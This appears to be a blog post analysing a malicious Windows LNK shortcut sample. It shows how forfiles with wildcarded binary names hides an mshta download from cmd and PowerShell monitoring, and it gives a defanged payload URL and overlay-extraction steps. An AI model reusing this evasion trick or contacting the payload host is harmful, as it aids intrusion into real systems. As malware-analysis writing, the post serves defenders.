In this post, we will analyze how the LNK shortcuts file can be used by threat actors for malicious purposes.
The source of the sample is Malware Bazaar.
Let’s extract the shortcut to our desktop folder. If given the assumption the file does not have a weird name like a hash or an random icon like in my case, it is barely distinguishable from other files.
A person might try to use the open file location option in hope of finding its source, which in turn cannot be held accountable because the LNK file directs towards a file in the system32 folder.
Seeing the properties of the file might be worth an observation. In the below case, you might see a powershell. Most obviously, you might have cmd instead of powershell and still make the things work.
The target does not have any limit defined, but by architecture, Windows limits it to some extent. If your command is too long, then you might be able to see only clipped commands.
Let’s use the file utility to check its type.
It’s worth observing the hide normal show minimized at the end of the output.
We are using a utility called LEcmd to parse the LNK file.
The relative path shows the file name that was shown when we used the open file location options.
The arguments show the actual command that will be executed.
We can also see the icon associated with the shortcut.
If you observe precisely, you might notice the names of the actual files have been clipped, i.e., notep*.exe and msh*a. The forfiles will loop the directory path for the matches of them.
Usually, security analysts use queries to monitor commands that include cmd or PowerShell; the adversary smartly used the forfiles utility to evade any such purpose. You can use this in conjunction with cm*.exe, powersh*.exe, or any other combination.
The mshta utility parses the file located at a remote location, in this case,
hxxps[://]ctu[.]timeless-tales[.]shop/api/uz/0912545164/CharcoalWharf[.]json
Then the PowerShell uses the start process parameter to execute the parsed file, i.e., CharcoalWharf.json.
Let’s check the file type of the parsed file. The file CharcoalWharf.json is a PE file with an overlay.
We use the hash of the file to check whether it has ever been uploaded to Virustotal, and insights from Virustotal might be helpful for further analysis.
The file has been detected by 33 engines as malicious at the current point in time.
Remember, the PE file containing an overlay is worth examination. We use a tool called pecheck.py to extract or differentiate the overlay from the actual file.
python pecheck.py -g o -D CharcoalWharf.json > CharcoalWharf.json.overlay
python pecheck.py -g s -D CharcoalWharf.json > CharcoalWharf.json.strip
The first command extracts the overlay from the file.
The second command extracts the actual file without overlay.
Let’s check the file type of the actual or stripped file using DIE.
We can repeat the same process to search the hash on Virustotal for more intel.
The file has been detected by 18 engines as malicious at the current point in time.
Interesting to note that the overlay of the extracted file also has an overlay; we used DIE for this verification.
On Virustotal, the file has been detected by 10 engines.
Let’s extract the overlay of the overlay file using the same utility.
python pecheck.py -g o -D CharcoalWharf.json.overlay > CharcoalWharf.json.overlay.overlay
The file CharcoalWharf.json.overlay.overlay is a binary file, as shown by DIE.
On Virustotal, the file was never uploaded; after we uploaded it, we see it was still in any way detected by 1 vendor.
Upon opening the binary file in NP++, we could interpret it as an HTA application by observing the very first line. Also, the presence of MZ magic bytes means the file is executable.
We meet next time dissecting another sample or coming up with an evasion technique until then. Бааи Баи